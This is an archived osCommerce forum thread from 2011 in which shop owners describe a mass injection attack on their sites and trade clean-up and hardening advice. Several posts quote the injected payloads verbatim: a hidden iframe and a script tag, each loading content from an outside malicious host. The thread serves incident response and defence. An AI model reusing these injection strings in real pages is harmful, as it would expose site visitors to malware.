stevenchim Posted July 25, 2011 Share Posted July 25, 2011 Starting from last Saturday there is some additional code disappear on my site.. For example, when I receive a e-mail from customer enquiry box. The title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX the script between is added by unknown people. Did anyone have this problem too? And how can I remove it? Link to comment Share on other sites More sharing options...
Jack_mcs Posted July 25, 2011 Share Posted July 25, 2011 You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added toallow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
stevenchim Posted July 25, 2011 Author Share Posted July 25, 2011 yes I am downloading all the code of the site. And try to look at it.. Link to comment Share on other sites More sharing options...
stevenchim Posted July 25, 2011 Author Share Posted July 25, 2011 Any idea where to start looking at? The first step I do is just searching the key word but no result. Any idea where I should starting look at? The recent change is I change permission of image folder to 777 Link to comment Share on other sites More sharing options...
Jack_mcs Posted July 26, 2011 Share Posted July 26, 2011 It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
stevenchim Posted July 26, 2011 Author Share Posted July 26, 2011 It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file. I found ..may be twenty .php file in the image folder, which should not exist in this folder. I deleted them all and still looking for un-usual file. Thanks. Link to comment Share on other sites More sharing options...
stevenchim Posted July 26, 2011 Author Share Posted July 26, 2011 When I go to the site. Its loads some unknown element like exero.eu, gooqlepic.com, yandekapi.com...etc.. Still finding where to remove them~~ Link to comment Share on other sites More sharing options...
♥Biancoblu Posted July 26, 2011 Share Posted July 26, 2011 If you still have the problem it means you haven't removed all of the hacker's code. If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures. ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
the_katsu Posted July 26, 2011 Share Posted July 26, 2011 My site got hacked as this way too. You need to erase injected codes on your database. http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x. The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released? Link to comment Share on other sites More sharing options...
stevenchim Posted July 26, 2011 Author Share Posted July 26, 2011 My site got hacked as this way too. You need to erase injected codes on your database. http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x. The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released? Thanks for your imformation. I have looked into the database, but it seems fine for me. I cant find any <iframe> tags in the database :( Link to comment Share on other sites More sharing options...
lmalonsof Posted July 26, 2011 Share Posted July 26, 2011 Hi there, we have the same problem. We've been infected with this: <iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> It was in the 'configuration_value' field from the 'configuration' table, in the first record just where 'Store_name' is. We've been able to clean the database and now it is fine but we don't know what to do. We assume this an oscommerce bug but, which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too? thanks Link to comment Share on other sites More sharing options...
♥Biancoblu Posted July 26, 2011 Share Posted July 26, 2011 If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1. ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
lmalonsof Posted July 26, 2011 Share Posted July 26, 2011 If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1. Ok, working on it. We'll report further problems. Link to comment Share on other sites More sharing options...
sucuri Posted July 27, 2011 Share Posted July 27, 2011 Those are not injected in the database, but inside the text defines of your site (at least in the ones we analyzed). So a grep for that keyword should find the where they are... This scanner should tell you if your site is hacked: http://sitecheck.sucuri.net Link to comment Share on other sites More sharing options...
Guest Posted July 30, 2011 Share Posted July 30, 2011 Our site got hacked as well. It was injected in the DB (config values). Only removing it from the database wont help long, you have to update the security. We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;) Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain... Feel free to contact u for help. Link to comment Share on other sites More sharing options...
stevenchim Posted August 1, 2011 Author Share Posted August 1, 2011 Our site got hacked as well. It was injected in the DB (config values). Only removing it from the database wont help long, you have to update the security. We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;) Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain... Feel free to contact u for help. So which table(s) of DB is affected? Link to comment Share on other sites More sharing options...
Taipo Posted August 1, 2011 Share Posted August 1, 2011 Steven Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands. You need to also patch your sites security as is listed in most of the discussions in this part of the forums. That is assuming you are at least using a recent version of osCommerce. Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce. I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products. Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1 Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does. If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
stevenchim Posted August 2, 2011 Author Share Posted August 2, 2011 Steven Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands. You need to also patch your sites security as is listed in most of the discussions in this part of the forums. That is assuming you are at least using a recent version of osCommerce. Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce. I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products. Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1 Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does. If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well. Thank you very much for the advice. I will try to see what I can do. As we all know the shop name is changed like every 5 hours. Yesterday I have deleted the file manager php file from admin. And now it seems fine. Link to comment Share on other sites More sharing options...
Query11 Posted August 2, 2011 Share Posted August 2, 2011 So which table(s) of DB is affected? Try to clean using the SQL scripts from here: http://www.greatis.com/security/exero-eu-web-site-infection-removal.htm http://www.greatis.com/security/willysy-com-images-banners-infection-removal.htm Scripts are for free. Update your osCommerce. Link to comment Share on other sites More sharing options...
sucuri Posted August 2, 2011 Share Posted August 2, 2011 Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there. Some details: http://sucuri.net/oscommerce-compromises-1see-irj-willysy-com-and-exero-eu.html thanks, Link to comment Share on other sites More sharing options...
Query11 Posted August 3, 2011 Share Posted August 3, 2011 Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there. Thank you for your useful information. Looks like "1see.ir/j/" is improved version of "exero". It infects not only configuration. "1see.ir/j/" is able to be injected to each text field of the database. Here it is the free script for removal "1see.ir/j/": http://www.greatis.com/security/1see-ir-infection-removal.htm Link to comment Share on other sites More sharing options...
stevenchim Posted August 9, 2011 Author Share Posted August 9, 2011 after I did all the actions mentioned above.. the site is ok for the last few days.. but today comes to something new (shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title> sign... Link to comment Share on other sites More sharing options...
Guest Posted August 9, 2011 Share Posted August 9, 2011 Steven, Your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that. Chris Link to comment Share on other sites More sharing options...
Taipo Posted August 9, 2011 Share Posted August 9, 2011 Steven did you give osC_Sec a try in the end? - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
stevenchim Posted August 11, 2011 Author Share Posted August 11, 2011 Steven did you give osC_Sec a try in the end? What is osC_Sec? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.